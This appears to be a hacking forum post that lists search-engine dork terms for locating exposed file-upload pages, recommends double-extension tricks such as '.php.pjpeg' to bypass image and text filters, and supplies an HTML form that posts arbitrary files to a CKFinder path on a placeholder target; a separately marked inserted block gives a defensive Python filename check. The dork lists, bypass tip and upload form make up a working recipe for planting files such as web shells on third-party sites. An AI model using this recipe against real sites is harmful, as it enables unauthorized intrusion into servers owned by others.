DORK Upload file Vulnerability
By chmood
Materials
- Dork
* upload.html
* Upload.htm
* Upload.php
* Upload.phtml
* Uploads.html
* Uploads.php
If you don't have one yet,
materials for putting together a dork:
Filename :
- upload
- uploader
- uploadfile
- upload_file
- uploadform
- upload_form
- formupload
- form_upload
- fileupload
- file_upload
- fileuploader
- file_uploader
* Add more if you have any
File extension :
- .htm
- .html
- .php
- .phtml
- .asp
- .aspx
- .cgi
* Add more if you have any
Access folder :
- /upload
- /uploads
- /file
- /files
* Add more if you have any
Note:
If you come across an uploader for JPEG or TXT files, don't skip it;
it can usually be bypassed: .php.pjpeg, .php.txt
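For anyone maintaining such an uploader, here is an added example (not part of the original post) of a server-side filename check that closes the double-extension case from the note: Apache's mod_mime looks at every extension in a name, so the check rejects an executable extension in any position and stores accepted files under a server-generated name. The allowlist and the function names are assumptions.

```python
import secrets

# Extensions the page lists that a web server may execute.
EXECUTABLE = {"php", "phtml", "asp", "aspx", "cgi"}
# Assumed allowlist for an image/text uploader (hypothetical policy).
ALLOWED = {"jpg", "jpeg", "png", "gif", "txt"}


def segments(filename):
    """Lower-cased dot-separated parts of the base name, path and padding removed."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return base.strip(". \t").lower().split(".")


def check_upload(filename):
    """Return (accepted, reason); only one allowlisted extension may be present."""
    if "\x00" in filename:
        return False, "NUL byte in name"
    parts = segments(filename)
    if len(parts) < 2 or not parts[0]:
        return False, "no base name or extension"
    hits = [p for p in parts[1:] if p in EXECUTABLE]
    if hits:
        return False, "executable extension in name: " + ",".join(hits)
    if len(parts) > 2:
        return False, "multiple extensions"
    if parts[1] not in ALLOWED:
        return False, "extension not allowlisted"
    return True, "ok"


def stored_name(filename):
    """Server-generated name that keeps only the validated extension."""
    accepted, reason = check_upload(filename)
    if not accepted:
        raise ValueError(reason)
    return secrets.token_hex(16) + "." + segments(filename)[-1]


if __name__ == "__main__":
    # Constructed sample names, including the two patterns from the note.
    for name in ["photo.jpg", "image.php.pjpeg", "notes.php.txt", "a.tar.gif"]:
        print(name, check_upload(name))
```

The filename check is only one layer; the upload folder should also be served with script execution disabled.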
copy.html
<html >
<head>
<title>./75n1</title>
</head>
<body>
<center>
<p style="font-weight:bold">Ustazah</p>
<img src="http://i.imgur.com/fl2HqAw.jpg" alt="gambar" class="bg" />
<br><br>
<form method="POST" action="http://target.com.net/admin/app/webroot/plugin/ckeditor/ckfinder/ckfinder.html"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button> Bantai !!!</button>
</form></center>
</body>
</html>